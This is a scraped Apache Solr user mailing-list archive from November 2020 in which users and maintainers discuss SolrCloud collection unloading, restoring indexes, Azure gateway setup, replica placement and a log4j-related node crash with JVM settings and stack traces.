Solr (Lucene actually) has  file handle open to every file in the index
all the time.

These files aren’t visible when you do a directory listing. So if you
stop Solr, are the files gone? NOTE: When you start Solr again, if
there are existing replicas that are healthy then the entire index
should be copied from another replica….

Best,
Erick

> On Nov 9, 2020, at 3:30 AM, Amy Bai  wrote:
>
> Hi community,
>
> I found that SolrCloud won't check the IO status if the SolrCloud process is 
> alive.
> E.g. If I delete the SolrCloud data directory, there are no errors report, 
> and I can still log in to the SolrCloud   Admin UI to create/query 
> collections.
> Is this reasonable?
> Can someone explain why SOLR handles it like this?
> Thanks so much.
>
>
> Regards,
> Amy


Re: Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-15 Thread Gajanan
Thanks for the replies. I wanted to make sure that I am not missing
something already available. Now that everything is clear, I may have to go
for an application redesign or choose a not-so-elegant approach, as
suggested.
Thanks all.
-Gajanan 



--
Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-15 Thread Ilan Ginzburg
An inelegant alternative is to back up and delete a collection in lieu of
unloading it, and restore it in lieu of loading it...

Ilan
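
A minimal sketch of that approach with the Collections API (names are
placeholders, and the location must be a directory reachable from every node,
e.g. a shared mount):

  curl 'http://localhost:8983/solr/admin/collections?action=BACKUP&name=coll1-snap&collection=coll1&location=/mnt/solr-backups'
  curl 'http://localhost:8983/solr/admin/collections?action=DELETE&name=coll1'
  # ...later, when the collection is needed again:
  curl 'http://localhost:8983/solr/admin/collections?action=RESTORE&name=coll1-snap&collection=coll1&location=/mnt/solr-backups'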

On Sun, Nov 15, 2020 at 6:56 PM Erick Erickson 
wrote:

> I don’t really have any good alternatives. There’s an open JIRA for
> this, see: SOLR-6399
>
> This would be a pretty big chunk of work, which is one of the reasons
> this JIRA has languished…
>
> Sorry I can’t be more helpful,
> Erick
>
> > On Nov 15, 2020, at 11:00 AM, Gajanan  wrote:
> >
> > Hi Erick, thanks for the reply.
> > I am working on a application where a  solr collection is being created
> per
> > usage of application accumulating lot of them over period of time . In
> order
> > to keep memory requirements under control, I am unloading collections
> not in
> > current usage and loading them whenever required.
> > This was working in non cloud mode with coreAdmin APIs. Now because of
> > scaling requirements we want to shift to SolrCloud mode. we want to
> continue
> > with same application design. can you suggest, how to implement a similar
> > solution in SolrCloud context.
> >
> > -Gajanan
> >
> >
> >
> > --
> > Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html
>
>


Re: Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-15 Thread Erick Erickson
I don’t really have any good alternatives. There’s an open JIRA for
this, see: SOLR-6399

This would be a pretty big chunk of work, which is one of the reasons
this JIRA has languished…

Sorry I can’t be more helpful,
Erick

> On Nov 15, 2020, at 11:00 AM, Gajanan  wrote:
> 
> Hi Erick, thanks for the reply.
> I am working on a application where a  solr collection is being created per
> usage of application accumulating lot of them over period of time . In order
> to keep memory requirements under control, I am unloading collections not in
> current usage and loading them whenever required. 
> This was working in non cloud mode with coreAdmin APIs. Now because of
> scaling requirements we want to shift to SolrCloud mode. we want to continue
> with same application design. can you suggest, how to implement a similar
> solution in SolrCloud context.
> 
> -Gajanan
> 
> 
> 
> --
> Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html



Re: Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-15 Thread Gajanan
Hi Erick, thanks for the reply.
I am working on an application where a Solr collection is created per
usage of the application, accumulating a lot of them over time. In order
to keep memory requirements under control, I am unloading collections not in
current use and loading them whenever required.
This was working in non-cloud mode with the CoreAdmin APIs. Now, because of
scaling requirements, we want to shift to SolrCloud mode, and we want to continue
with the same application design. Can you suggest how to implement a similar
solution in a SolrCloud context?

-Gajanan



--
Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Setting up SolrCloud Behind Azure Application Gateway

2020-11-12 Thread Victor Kretzer
I'm attempting to set up SolrCloud for use with Sitecore 9.0.2. I want to set 
up my Azure Application Gateway with a TLS cert. I want a private IP for 
Sitecore and a public IP for accessing the Solr Admin Dashboard. My goal is to 
use Application Gateway for the TLS termination and then route to the backend using the 
http protocol.

I currently have the following configuration:
* 2 SolrCloud 6.6.6 nodes on 2 Azure Ubuntu 18.04 LTS VMs
* 3 Zookeeper nodes on 3 Azure Ubuntu VMs
* A VPN with the IPs of all the above
* An Application Gateway with:
  o a public listener on port 443
  o a public listener on port 80 (to eliminate the cert as a cause of my issues)
  o a backend pool for the two SolrCloud VMs
  o an HTTP setting for backend port 8983

I can access the dashboard for the nodes using:
* http://<node-pub-ip>:8983/solr/#/

But not when using either of the following:
* https://<app-gtwy-ip>/solr/# with a public listener on port 443
* http://<app-gtwy-ip>/solr/# with a public listener on port 80

The private IPs of both SolrCloud VMs are reporting healthy on port 8983 with a 
302-status code according to the default Backend Health monitor on Application 
Gateway.

I greatly appreciate any help provided.

Thanks,

Victor



Re: Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-12 Thread Erick Erickson
As stated in the docs, using the core admin API when using SolrCloud is not recommended, 
for just this kind of reason. While SolrCloud _does_ use the Core Admin API, its usage
has to be very precise.

You apparently didn’t heed this warning in the UNLOAD command for the 
collections API:

"Unloading all cores in a SolrCloud collection causes the removal of that 
collection’s metadata from ZooKeeper.”

This latter is what the “non legacy mode…” message is about. In earlier 
versions of Solr,
the ZK information was recreated when Solr found a core.properties file, but 
that had
its own problems so was removed.

Your best bet now is to wipe your directories, create a new collection and 
re-index.

If you absolutely can’t reindex:
0> save away one index directory from every shard, it doesn’t matter which.
1> create the collection, with the exact same number of shards and a 
replicationFactor of 1
2> shut down all the Solr instances
3> copy the index directory from <0> to ’the right place”. For instance, if you
have a collection blah, you’ll have some directory like 
blah_shard1_replica_n1/data/index.
It’s critical that you replace the contents of data/index with the contents 
of the
directory saved in <0> from the _same_ shard, shard1 in this example.
4> start your Solr instances back up
5> use ADDREPLICA to build out the collection to have as many replicas as you 
need.

Good luck!
Erick
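
A minimal sketch of steps 0-5 for a two-shard collection named blah (the paths and
core directory names are examples; the critical part is matching each saved index
directory to the shard it came from):

  curl 'http://localhost:8983/solr/admin/collections?action=CREATE&name=blah&numShards=2&replicationFactor=1'
  bin/solr stop -all
  cp -r /backup/shard1/index/. /var/solr/data/blah_shard1_replica_n1/data/index/
  cp -r /backup/shard2/index/. /var/solr/data/blah_shard2_replica_n2/data/index/
  bin/solr start -cloud -z zk1:2181
  curl 'http://localhost:8983/solr/admin/collections?action=ADDREPLICA&collection=blah&shard=shard1'
  curl 'http://localhost:8983/solr/admin/collections?action=ADDREPLICA&collection=blah&shard=shard2'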


> On Nov 12, 2020, at 6:32 AM, Gajanan  wrote:
> 
> I have unloaded all cores of a collection in SolrCloud (8.x.x ) using
> coreAdmin APIs as UNLOAD collection is not available in collections API. Now
> I want reload the unloaded collection using APIs only. 
> When trying with coreAdmin APIs I am getting "Non legacy mode CoreNodeName
> not found." 
> When trying with collections APIs it is reloaded but shows no cores
> available.
> 
> 
> 
> 
> --
> Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html



How to unload and reload a solr collection in SolrCloud

2020-11-12 Thread Gajanan Watkar
I want to unload and reload all cores of a collection in SolrCloud mode
(Solr 8.x.x).

-- 
-Gajanan


Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-12 Thread Gajanan
I have unloaded all cores of a collection in SolrCloud (8.x.x) using the
CoreAdmin APIs, as UNLOAD for a collection is not available in the Collections API. Now
I want to reload the unloaded collection using APIs only.
When trying with the CoreAdmin APIs I am getting "Non legacy mode CoreNodeName
not found."
When trying with the Collections APIs it is reloaded but shows no cores
available.




--
Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: SolrCloud shows cluster still healthy even the node data directory is deleted

2020-11-11 Thread Amy Bai
Hi Erick,

Thanks for your kind reply.
There are two things that confuse me:

1. Index/search queries keep failing because one node's data directory is 
gone, but the node is not marked as down.

2. The replicas on the failed node are not working, but the index/search 
queries didn't fail over to other healthy replicas.

Regards,
Amy

From: Erick Erickson 
Sent: Monday, November 9, 2020 8:43 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted

Depends. *nix systems have delete-on-close semantics, that is as
long as there’s a single file handle open, the file will be still be
available to the process using it. Only when the last file handle is
closed will the file actually be deleted.

Solr (Lucene actually) has  file handle open to every file in the index
all the time.

These files aren’t visible when you do a directory listing. So if you
stop Solr, are the files gone? NOTE: When you start Solr again, if
there are existing replicas that are healthy then the entire index
should be copied from another replica….

Best,
Erick

> On Nov 9, 2020, at 3:30 AM, Amy Bai  wrote:
>
> Hi community,
>
> I found that SolrCloud won't check the IO status if the SolrCloud process is 
> alive.
> E.g. If I delete the SolrCloud data directory, there are no errors report, 
> and I can still log in to the SolrCloud   Admin UI to create/query 
> collections.
> Is this reasonable?
> Can someone explain why SOLR handles it like this?
> Thanks so much.
>
>
> Regards,
> Amy



Re: SolrCloud shows cluster still healthy even the node data directory is deleted

2020-11-09 Thread Erick Erickson
Depends. *nix systems have delete-on-close semantics, that is, as
long as there's a single file handle open, the file will still be
available to the process using it. Only when the last file handle is
closed will the file actually be deleted.

Solr (Lucene actually) has a file handle open to every file in the index
all the time.

These files aren’t visible when you do a directory listing. So if you
stop Solr, are the files gone? NOTE: When you start Solr again, if
there are existing replicas that are healthy then the entire index
should be copied from another replica….

Best,
Erick

> On Nov 9, 2020, at 3:30 AM, Amy Bai  wrote:
> 
> Hi community,
> 
> I found that SolrCloud won't check the IO status if the SolrCloud process is 
> alive.
> E.g. If I delete the SolrCloud data directory, there are no errors report, 
> and I can still log in to the SolrCloud   Admin UI to create/query 
> collections.
> Is this reasonable?
> Can someone explain why SOLR handles it like this?
> Thanks so much.
> 
> 
> Regards,
> Amy



SolrCloud shows cluster still healthy even the node data directory is deleted

2020-11-09 Thread Amy Bai
Hi community,

I found that SolrCloud won't check the IO status if the SolrCloud process is 
alive.
E.g. if I delete the SolrCloud data directory, there are no errors reported, and 
I can still log in to the SolrCloud Admin UI to create/query collections.
Is this reasonable?
Can someone explain why SOLR handles it like this?
Thanks so much.


Regards,
Amy


Re: Solrcloud create collection ignores createNodeSet parameter

2020-10-27 Thread Erick Erickson
You’re confusing replicas and shards a bit. Solr tries its best to put multiple 
replicas _of the same shard_ on different nodes. You have two shards though 
with _one_ replica each. This is a bit of a nit, but important to keep in mind when 
your replicationFactor increases. So from an HA perspective, this isn’t 
catastrophic, since both shards must be up anyway.

That said, it does seem reasonable to use all the nodes in your case. If you 
omit the createNodeSet, what happens? I’m curious if that’s confusing things 
somehow. And can you totally guarantee that both nodes are accessible when the 
collection is created?

BTW, I’ve always disliked the parameter name “maxShardsPerNode”, shards isn’t 
what it’s actually about. But I suppose 
“maxReplicasOfAnyIndividualShardOnASingleNode” is a little verbose...

> On Oct 27, 2020, at 2:17 PM, Webster Homer  
> wrote:
> 
> We have a solrcloud set up with 2 nodes, 1 zookeeper and running Solr 7.7.2 
> This cloud is used for development purposes. Collections are sharded across 
> the 2 nodes.
> 
> Recently we noticed that one of the main collections we use had both replicas 
> running on the same node. Normally we don't see collections created where the 
> replicas run on the same node.
> 
> I tried to create a new version of the collection forcing it to use both 
> nodes. However, that doesn't work both replicas are created on the same node:
> /solr/admin/collections?action=CREATE=sial-catalog-product-20201027=sial-catalog-product-20200808=2=1=1=uc1a-ecomdev-msc02:8983_solr,uc1a-ecomdev-msc01:8983_solr
> The call returns this:
> {
>"responseHeader": {
>"status": 0,
>"QTime": 4659
>},
>"success": {
>"uc1a-ecomdev-msc01:8983_solr": {
>"responseHeader": {
>"status": 0,
>"QTime": 3900
>},
>"core": "sial-catalog-product-20201027_shard2_replica_n2"
>},
>"uc1a-ecomdev-msc01:8983_solr": {
>"responseHeader": {
>"status": 0,
>"QTime": 4012
>},
>"core": "sial-catalog-product-20201027_shard1_replica_n1"
>}
>}
> }
> 
> Both replicas are created on the same node. Why is this happening?
> 
> How do we force the replicas be placed on different nodes?
> 
> 
> 
> This message and any attachment are confidential and may be privileged or 
> otherwise protected from disclosure. If you are not the intended recipient, 
> you must not copy this message or attachment or disclose the contents to any 
> other person. If you have received this transmission in error, please notify 
> the sender immediately and delete the message and any attachment from your 
> system. Merck KGaA, Darmstadt, Germany and any of its subsidiaries do not 
> accept liability for any omissions or errors in this message which may arise 
> as a result of E-Mail-transmission or for damages resulting from any 
> unauthorized changes of the content of this message and any attachment 
> thereto. Merck KGaA, Darmstadt, Germany and any of its subsidiaries do not 
> guarantee that this message is free of viruses and does not accept liability 
> for any damages caused by any virus transmitted therewith.
> 
> 
> 
> Click http://www.merckgroup.com/disclaimer to access the German, French, 
> Spanish and Portuguese versions of this disclaimer.



Solrcloud create collection ignores createNodeSet parameter

2020-10-27 Thread Webster Homer
We have a solrcloud set up with 2 nodes, 1 zookeeper and running Solr 7.7.2 
This cloud is used for development purposes. Collections are sharded across the 
2 nodes.

Recently we noticed that one of the main collections we use had both replicas 
running on the same node. Normally we don't see collections created where the 
replicas run on the same node.

I tried to create a new version of the collection forcing it to use both nodes. 
However, that doesn't work; both replicas are created on the same node:
/solr/admin/collections?action=CREATE=sial-catalog-product-20201027=sial-catalog-product-20200808=2=1=1=uc1a-ecomdev-msc02:8983_solr,uc1a-ecomdev-msc01:8983_solr
The call returns this:
{
"responseHeader": {
"status": 0,
"QTime": 4659
},
"success": {
"uc1a-ecomdev-msc01:8983_solr": {
"responseHeader": {
"status": 0,
"QTime": 3900
},
"core": "sial-catalog-product-20201027_shard2_replica_n2"
},
"uc1a-ecomdev-msc01:8983_solr": {
"responseHeader": {
"status": 0,
"QTime": 4012
},
"core": "sial-catalog-product-20201027_shard1_replica_n1"
}
}
}

Both replicas are created on the same node. Why is this happening?

How do we force the replicas be placed on different nodes?
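
(For reference, the archive has stripped the parameter names from the CREATE URL
above; a well-formed call with createNodeSet would look roughly like this, using
the standard 7.x Collections API parameter names and the values inferred from the
mangled query string:)

  curl 'http://localhost:8983/solr/admin/collections?action=CREATE&name=sial-catalog-product-20201027&collection.configName=sial-catalog-product-20200808&numShards=2&replicationFactor=1&maxShardsPerNode=1&createNodeSet=uc1a-ecomdev-msc02:8983_solr,uc1a-ecomdev-msc01:8983_solr'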



This message and any attachment are confidential and may be privileged or 
otherwise protected from disclosure. If you are not the intended recipient, you 
must not copy this message or attachment or disclose the contents to any other 
person. If you have received this transmission in error, please notify the 
sender immediately and delete the message and any attachment from your system. 
Merck KGaA, Darmstadt, Germany and any of its subsidiaries do not accept 
liability for any omissions or errors in this message which may arise as a 
result of E-Mail-transmission or for damages resulting from any unauthorized 
changes of the content of this message and any attachment thereto. Merck KGaA, 
Darmstadt, Germany and any of its subsidiaries do not guarantee that this 
message is free of viruses and does not accept liability for any damages caused 
by any virus transmitted therewith.



Click http://www.merckgroup.com/disclaimer to access the German, French, 
Spanish and Portuguese versions of this disclaimer.


Re: SolrCloud 6.6.2 suddenly crash due to slow queries and Log4j issue

2020-10-19 Thread Dominique Bejean
Shawn,

According to the log4j bug description (
https://bz.apache.org/bugzilla/show_bug.cgi?id=57714), the issue is related
to a lock taken while iterating over the appenders.

In addition to the CONSOLE and file appenders in the default log4j.properties,
my customer added 2 extra FileAppenders dedicated to all requests and slow
requests. I suggested removing these two extra appenders.
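
A quick way to see how many loggers and appenders the configuration actually
declares (the path is the one from the -Dlog4j.configuration setting quoted in
this thread):

  grep -n 'log4j.rootLogger\|log4j.logger\|log4j.appender' /xx/log4j.properties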

Regards

Dominique



Le lun. 19 oct. 2020 à 15:48, Dominique Bejean 
a écrit :

> Hi Shawn,
>
> Thank you for your response.
>
> You are confirming my diagnosis.
>
> This is in fact a 8 nodes cluster with one single collection with 4 shards
> and 1 replica (8 cores).
>
> 4 Gb heap and 90 Gb Ram
>
>
> When no issue occurs nearly 50% of the heap is used.
>
> Num Docs in collection : 10.000.000
>
> Num Docs per core is more or less 2.500.000
>
> Max Doc per core is more or less 3.000.000
>
> Core Data size is more or less 70 Gb
>
> Here are the JVM settings
>
> -DSTOP.KEY=solrrocks
>
> -DSTOP.PORT=7983
>
> -Dcom.sun.management.jmxremote
>
> -Dcom.sun.management.jmxremote.authenticate=false
>
> -Dcom.sun.management.jmxremote.local.only=false
>
> -Dcom.sun.management.jmxremote.port=18983
>
> -Dcom.sun.management.jmxremote.rmi.port=18983
>
> -Dcom.sun.management.jmxremote.ssl=false
>
> -Dhost=
>
> -Djava.rmi.server.hostname=XXX
>
> -Djetty.home=/x/server
>
> -Djetty.port=8983
>
> -Dlog4j.configuration=file:/xx/log4j.properties
>
> -Dsolr.install.dir=/xx/solr
>
> -Dsolr.jetty.request.header.size=32768
>
> -Dsolr.log.dir=/xxx/Logs
>
> -Dsolr.log.muteconsole
>
> -Dsolr.solr.home=//data
>
> -Duser.timezone=Europe/Paris
>
> -DzkClientTimeout=3
>
> -DzkHost=xxx
>
> -XX:+CMSParallelRemarkEnabled
>
> -XX:+CMSScavengeBeforeRemark
>
> -XX:+ParallelRefProcEnabled
>
> -XX:+PrintGCApplicationStoppedTime
>
> -XX:+PrintGCDateStamps
>
> -XX:+PrintGCDetails
>
> -XX:+PrintGCTimeStamps
>
> -XX:+PrintHeapAtGC
>
> -XX:+PrintTenuringDistribution
>
> -XX:+UseCMSInitiatingOccupancyOnly
>
> -XX:+UseConcMarkSweepGC
>
> -XX:+UseGCLogFileRotation
>
> -XX:+UseGCLogFileRotation
>
> -XX:+UseParNewGC
>
> -XX:-OmitStackTraceInFastThrow
>
> -XX:CMSInitiatingOccupancyFraction=50
>
> -XX:CMSMaxAbortablePrecleanTime=6000
>
> -XX:ConcGCThreads=4
>
> -XX:GCLogFileSize=20M
>
> -XX:MaxTenuringThreshold=8
>
> -XX:NewRatio=3
>
> -XX:NumberOfGCLogFiles=9
>
> -XX:OnOutOfMemoryError=/xxx/solr/bin/oom_solr.sh
>
> 8983
>
> /xx/Logs
>
> -XX:ParallelGCThreads=4
>
> -XX:PretenureSizeThreshold=64m
>
> -XX:SurvivorRatio=4
>
> -XX:TargetSurvivorRatio=90
>
> -Xloggc:/xx/solr_gc.log
>
> -Xloggc:/xx/solr_gc.log
>
> -Xms4g
>
> -Xmx4g
>
> -Xss256k
>
> -verbose:gc
>
>
>
> Here is one screenshot of top command for the node that failed last week.
>
> [image: 2020-10-19 15_48_06-Photos.png]
>
> Regards
>
> Dominique
>
>
>
> Le dim. 18 oct. 2020 à 22:03, Shawn Heisey  a écrit :
>
>> On 10/18/2020 3:22 AM, Dominique Bejean wrote:
>> > A few months ago, I reported an issue with Solr nodes crashing due to
>> the
>> > old generation heap growing suddenly and generating OOM. This problem
>> > occurred again this week. I have threads dumps for each minute during
>> the 3
>> > minutes the problem occured. I am using fastthread.io in order to
>> analyse
>> > these dumps.
>>
>> 
>>
>> > * The Log4j issue starts (
>> > https://blog.fastthread.io/2020/01/24/log4j-bug-slows-down-your-app/)
>>
>> If the log4j bug is the root cause here, then the only way you can fix
>> this is to upgrade to at least Solr 7.4.  That is the Solr version where
>> we first upgraded from log4j 1.2.x to log4j2.  You cannot upgrade log4j
>> in Solr 6.6.2 without changing Solr code.  The code changes required
>> were extensive.  Note that I did not do anything to confirm whether the
>> log4j bug is responsible here.  You seem pretty confident that this is
>> the case.
>>
>> Note that if you upgrade to 8.x, you will need to reindex from scratch.
>> Upgrading an existing index is possible with one major version bump, but
>> if your index has ever been touched by a release that's two major
>> versions back, it won't work.  In 8.x, that is enforced -- 8.x will not
>> even try to read an old index touched by 6.x or earlier.
>>
>> In the following wiki page, I provided instructions for getting a
>> screenshot of the process listing.
>>
>> https://cwiki.apache.org/confluence/display/solr/SolrPerformanceProblems
>>
>> In addition to that screenshot, I would like to know the on-disk size of
>> all the cores running on the problem node, along with a document count
>> from those cores.  It might be possible to work around the OOM just by
>> increasing the size of the heap.  That won't do anything about problems
>> with log4j.
>>
>> Thanks,
>> Shawn
>>
>


Re: SolrCloud 6.6.2 suddenly crash due to slow queries and Log4j issue

2020-10-19 Thread Dominique Bejean
Hi Shawn,

Thank you for your response.

You are confirming my diagnosis.

This is in fact an 8-node cluster with one single collection with 4 shards
and 1 replica (8 cores).

4 GB heap and 90 GB RAM


When no issue occurs nearly 50% of the heap is used.

Num Docs in collection : 10.000.000

Num Docs per core is more or less 2.500.000

Max Doc per core is more or less 3.000.000

Core Data size is more or less 70 Gb

Here are the JVM settings

-DSTOP.KEY=solrrocks

-DSTOP.PORT=7983

-Dcom.sun.management.jmxremote

-Dcom.sun.management.jmxremote.authenticate=false

-Dcom.sun.management.jmxremote.local.only=false

-Dcom.sun.management.jmxremote.port=18983

-Dcom.sun.management.jmxremote.rmi.port=18983

-Dcom.sun.management.jmxremote.ssl=false

-Dhost=

-Djava.rmi.server.hostname=XXX

-Djetty.home=/x/server

-Djetty.port=8983

-Dlog4j.configuration=file:/xx/log4j.properties

-Dsolr.install.dir=/xx/solr

-Dsolr.jetty.request.header.size=32768

-Dsolr.log.dir=/xxx/Logs

-Dsolr.log.muteconsole

-Dsolr.solr.home=//data

-Duser.timezone=Europe/Paris

-DzkClientTimeout=3

-DzkHost=xxx

-XX:+CMSParallelRemarkEnabled

-XX:+CMSScavengeBeforeRemark

-XX:+ParallelRefProcEnabled

-XX:+PrintGCApplicationStoppedTime

-XX:+PrintGCDateStamps

-XX:+PrintGCDetails

-XX:+PrintGCTimeStamps

-XX:+PrintHeapAtGC

-XX:+PrintTenuringDistribution

-XX:+UseCMSInitiatingOccupancyOnly

-XX:+UseConcMarkSweepGC

-XX:+UseGCLogFileRotation

-XX:+UseGCLogFileRotation

-XX:+UseParNewGC

-XX:-OmitStackTraceInFastThrow

-XX:CMSInitiatingOccupancyFraction=50

-XX:CMSMaxAbortablePrecleanTime=6000

-XX:ConcGCThreads=4

-XX:GCLogFileSize=20M

-XX:MaxTenuringThreshold=8

-XX:NewRatio=3

-XX:NumberOfGCLogFiles=9

-XX:OnOutOfMemoryError=/xxx/solr/bin/oom_solr.sh

8983

/xx/Logs

-XX:ParallelGCThreads=4

-XX:PretenureSizeThreshold=64m

-XX:SurvivorRatio=4

-XX:TargetSurvivorRatio=90

-Xloggc:/xx/solr_gc.log

-Xloggc:/xx/solr_gc.log

-Xms4g

-Xmx4g

-Xss256k

-verbose:gc



Here is one screenshot of top command for the node that failed last week.

[image: 2020-10-19 15_48_06-Photos.png]

Regards

Dominique



Le dim. 18 oct. 2020 à 22:03, Shawn Heisey  a écrit :

> On 10/18/2020 3:22 AM, Dominique Bejean wrote:
> > A few months ago, I reported an issue with Solr nodes crashing due to the
> > old generation heap growing suddenly and generating OOM. This problem
> > occurred again this week. I have threads dumps for each minute during
> the 3
> > minutes the problem occured. I am using fastthread.io in order to
> analyse
> > these dumps.
>
> 
>
> > * The Log4j issue starts (
> > https://blog.fastthread.io/2020/01/24/log4j-bug-slows-down-your-app/)
>
> If the log4j bug is the root cause here, then the only way you can fix
> this is to upgrade to at least Solr 7.4.  That is the Solr version where
> we first upgraded from log4j 1.2.x to log4j2.  You cannot upgrade log4j
> in Solr 6.6.2 without changing Solr code.  The code changes required
> were extensive.  Note that I did not do anything to confirm whether the
> log4j bug is responsible here.  You seem pretty confident that this is
> the case.
>
> Note that if you upgrade to 8.x, you will need to reindex from scratch.
> Upgrading an existing index is possible with one major version bump, but
> if your index has ever been touched by a release that's two major
> versions back, it won't work.  In 8.x, that is enforced -- 8.x will not
> even try to read an old index touched by 6.x or earlier.
>
> In the following wiki page, I provided instructions for getting a
> screenshot of the process listing.
>
> https://cwiki.apache.org/confluence/display/solr/SolrPerformanceProblems
>
> In addition to that screenshot, I would like to know the on-disk size of
> all the cores running on the problem node, along with a document count
> from those cores.  It might be possible to work around the OOM just by
> increasing the size of the heap.  That won't do anything about problems
> with log4j.
>
> Thanks,
> Shawn
>


Re: SolrCloud 6.6.2 suddenly crash due to slow queries and Log4j issue

2020-10-18 Thread Shawn Heisey

On 10/18/2020 3:22 AM, Dominique Bejean wrote:

A few months ago, I reported an issue with Solr nodes crashing due to the
old generation heap growing suddenly and generating OOM. This problem
occurred again this week. I have threads dumps for each minute during the 3
minutes the problem occured. I am using fastthread.io in order to analyse
these dumps.





* The Log4j issue starts (
https://blog.fastthread.io/2020/01/24/log4j-bug-slows-down-your-app/)


If the log4j bug is the root cause here, then the only way you can fix 
this is to upgrade to at least Solr 7.4.  That is the Solr version where 
we first upgraded from log4j 1.2.x to log4j2.  You cannot upgrade log4j 
in Solr 6.6.2 without changing Solr code.  The code changes required 
were extensive.  Note that I did not do anything to confirm whether the 
log4j bug is responsible here.  You seem pretty confident that this is 
the case.


Note that if you upgrade to 8.x, you will need to reindex from scratch. 
Upgrading an existing index is possible with one major version bump, but 
if your index has ever been touched by a release that's two major 
versions back, it won't work.  In 8.x, that is enforced -- 8.x will not 
even try to read an old index touched by 6.x or earlier.


In the following wiki page, I provided instructions for getting a 
screenshot of the process listing.


https://cwiki.apache.org/confluence/display/solr/SolrPerformanceProblems

In addition to that screenshot, I would like to know the on-disk size of 
all the cores running on the problem node, along with a document count 
from those cores.  It might be possible to work around the OOM just by 
increasing the size of the heap.  That won't do anything about problems 
with log4j.


Thanks,
Shawn
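
For reference, one way to collect the numbers Shawn asks for (the paths and host
are placeholders):

  du -sh /path/to/solr/home/*/data/index        # on-disk size of each core's index
  curl 'http://localhost:8983/solr/admin/cores?action=STATUS&wt=json&indent=on' \
    | grep -E '"name"|"numDocs"|"sizeInBytes"'   # doc count and index size per core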


SolrCloud 6.6.2 suddenly crash due to slow queries and Log4j issue

2020-10-18 Thread Dominique Bejean
Hi,

A few months ago, I reported an issue with Solr nodes crashing due to the
old generation heap growing suddenly and generating OOM. This problem
occurred again this week. I have thread dumps for each minute during the 3
minutes the problem occurred. I am using fastthread.io in order to analyse
these dumps.

The thread scenario on the failing node is:

=== 15h54 -> it looks fine
Old gen heap: 0.5 Gb (3 Gb max)
67 threads TIMED_WAITING
26 threads RUNNABLE
7 threads WAITING

=== 15h55 -> fastthreads reports few suspects
Old gen heap starts growing: from 0.5 Gb to 2 Gb (3 Gb max)
42 threads TIMED_WAITING
41 threads RUNNABLE
10 threads WAITING

The first symptom is that 8 runnable threads are stuck (same stack trace)
waiting for a response from some other nodes:

java.lang.Thread.State: RUNNABLE
at java.net.SocketInputStream.socketRead0(Native Method)
at java.net.SocketInputStream.socketRead(SocketInputStream.java:116)
at java.net.SocketInputStream.read(SocketInputStream.java:170)
at java.net.SocketInputStream.read(SocketInputStream.java:141)
at
org.apache.http.impl.io.AbstractSessionInputBuffer.fillBuffer(AbstractSessionInputBuffer.java:160)
at
org.apache.http.impl.io.SocketInputBuffer.fillBuffer(SocketInputBuffer.java:84)
at
org.apache.http.impl.io.SocketInputBuffer.isDataAvailable(SocketInputBuffer.java:95)
at
org.apache.http.impl.AbstractHttpClientConnection.isStale(AbstractHttpClientConnection.java:310)
at
org.apache.http.impl.conn.ManagedClientConnectionImpl.isStale(ManagedClientConnectionImpl.java:158)
at
org.apache.http.impl.client.DefaultRequestDirector.execute(DefaultRequestDirector.java:433)
at
org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:882)
at
org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:82)
at
org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:55)
at
org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:515)
at
org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:279)
at
org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:268)
at
org.apache.solr.client.solrj.impl.LBHttpSolrClient.doRequest(LBHttpSolrClient.java:447)
at
org.apache.solr.client.solrj.impl.LBHttpSolrClient.request(LBHttpSolrClient.java:388)
at
org.apache.solr.handler.component.HttpShardHandlerFactory.makeLoadBalancedRequest(HttpShardHandlerFactory.java:302)
at
org.apache.solr.handler.component.HttpShardHandler.lambda$submit$0(HttpShardHandler.java:166)
at
org.apache.solr.handler.component.HttpShardHandler$$Lambda$192/1788637481.call(Unknown
Source)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at
com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:176)
at
org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:229)
at
org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor$$Lambda$15/986729174.run(Unknown
Source)
at
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at
java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)


=== 15h56 -> fastthreads reports issue
Old gen heap full: 3 Gb (3 Gb max)
57 threads TIMED_WAITING
126 threads RUNNABLE
18 threads WAITING
14 threads BLOCKED

7 runnable threads are still stuck (same stack trace) waiting for a response
from some other nodes

1 BLOCKED thread obtained org.apache.log4j.Logger's lock and did not release
it; because of that, 13 threads are BLOCKED (same stack trace) on
org.apache.log4j.Category.callAppenders:

java.lang.Thread.State: BLOCKED (on object monitor)
at org.apache.log4j.Category.callAppenders(Category.java:204)
- waiting to lock <0x0007005a6f08> (a org.apache.log4j.Logger)
at org.apache.log4j.Category.forcedLog(Category.java:391)
at org.apache.log4j.Category.log(Category.java:856)
at org.slf4j.impl.Log4jLoggerAdapter.info(Log4jLoggerAdapter.java:304)
at org.apache.solr.core.SolrCore.execute(SolrCore.java:2482)
